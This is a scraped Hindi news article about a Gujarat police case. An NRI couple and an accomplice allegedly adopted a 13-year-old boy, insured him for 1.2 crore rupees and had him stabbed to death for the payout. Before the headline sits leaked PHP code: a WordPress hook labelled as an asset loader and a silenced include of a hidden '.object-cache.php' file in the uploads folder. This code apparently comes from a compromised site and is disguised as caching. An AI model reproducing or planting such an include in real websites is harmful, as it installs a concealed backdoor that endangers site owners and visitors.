add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); लालच ने किया अंधा, बीमा के पैसों के लिए गोद लिए बच्चे की कर दी हत्या – SOCH INDIA
Menu

अपराध समाचार
लालच ने किया अंधा, बीमा के पैसों के लिए गोद लिए बच्चे की कर दी हत्या

nobanner

गुजरात के जूनागढ़ से एख सनसनीखेज मामला सामने आया है. यहां एक दंपति ने पैसों के लालच में अपने ही गोद लिए बच्चे की हत्या कर दी. इस एनआरआई जोड़े के खिलाफ एक बच्चे की हत्या का मामला दर्ज किया गया है. जिसे उन्होंने वर्ष 2015 में गोद लिया था.

1 करोड़ 20 लाख रुपए की बीमा राशि लेने के लिए साजिश

पुलिस ने बताया कि बच्चे की 1 करोड़ 20 लाख रुपए की बीमा राशि लेने के लिए एनआरआई जोड़े ने उसे मरवा डाला. आरती लोकनाथ और उसके पति कंवलजीत सिंह रायजादा फिलहाल लंदन में रह रहे हैं. केशोद पुलिस इंस्पेक्टर अशोक तिलवा ने बताया कि दोनों के खिलाफ 13 वर्षीय गोपाल की हत्या की साजिश का हिस्सा होने के आरोप में मामला दर्ज किया गया है.

बच्चे का बीमा कराया और फिर उसे मार डाला

तिलवा ने बताया कि आरती और कंवलजीत ने नीतीश मुंद के साथ मिल कर 13 वर्षीय गोपाल को गोद लेने की साजिश रची. उन्होंने बच्चे का बीमा कराया और फिर उसे मार डाला ताकि वह बीमा राशि ले सकें. वीजा एक्सपायर होने से पहले नीतीश भी लंदन में रहता था. तीनों ने मिल कर वर्ष 2015 में गोपाल को गोद लेने के बाद मारने की साजिश रची थी.

केशोद में दो अज्ञात मोटरसाइकिल सवारों ने चाकू से हमला किया था

नीतीश को हत्या के सिलसिले में कल गिरफ्तार किया गया जिसके बाद आरती और कंवलजीत की भूमिका का पता चला. गोपाल की कल राजकोट अस्पताल में मौत हो गई. उस पर आठ फरवरी की रात को जूनागढ़ जिले के केशोद में दो अज्ञात मोटरसाइकिल सवारों ने चाकू से हमला किया था.

इस खुलासे के बाद स्थानीय लोग और रिश्तेदार चकित हैं

तिलवा ने बताया कि गोपाल, नीतीश के साथ राजकोट से मालिया लौट रहा था. आरती और उसके पति लंदन में रहते हैं. अब पुलिस इस मामले में अन्य लोगो से पूछताछ कर रही है. इसके साथ ही इस खुलासे के बाद स्थानीय लोग और रिश्तेदार चकित हैं.